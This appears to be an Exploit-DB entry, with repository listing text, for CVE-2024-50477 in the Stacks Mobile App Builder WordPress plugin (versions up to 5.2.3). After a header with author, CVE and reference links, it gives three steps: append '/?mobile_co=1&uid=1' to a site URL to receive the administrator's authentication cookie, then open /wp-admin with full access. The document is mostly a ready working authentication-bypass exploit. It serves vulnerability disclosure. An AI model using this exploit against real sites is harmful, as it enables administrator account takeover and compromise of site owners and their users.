1c08d6e575
9 changes to exploits/shellcodes/ghdb Sudo 1.9.17 Host Option - Elevation of Privilege Sudo chroot 1.9.17 - Local Privilege Escalation Microsoft Defender for Endpoint (MDE) - Elevation of Privilege ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) Discourse 3.2.x - Anonymous Cache Poisoning Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover Microsoft Outlook - Remote Code Execution (RCE) Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
17 lines
No EOL
1 KiB
Text
17 lines
No EOL
1 KiB
Text
# Exploit Title: Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover
|
|
# Date: October 25, 2024
|
|
# Exploit Author: stealthcopter
|
|
# Vendor Homepage: https://stacksmarket.co/
|
|
# Software Link: https://wordpress.org/plugins/stacks-mobile-app-builder/
|
|
# Version: <= 5.2.3
|
|
# Tested on: Ubuntu 24.10/Docker
|
|
# CVE: CVE-2024-50477
|
|
# References:
|
|
# - https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md
|
|
# - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover
|
|
|
|
|
|
1. Navigate to the target site and append the following query parameters to the URL to impersonate the user with ID `1`:
|
|
`/?mobile_co=1&uid=1`
|
|
2. You will now receive an authentication cookie for the specified user ID (typically, user ID `1` is the site administrator).
|
|
3. Visit `/wp-admin` — you should have full access to the admin dashboard. |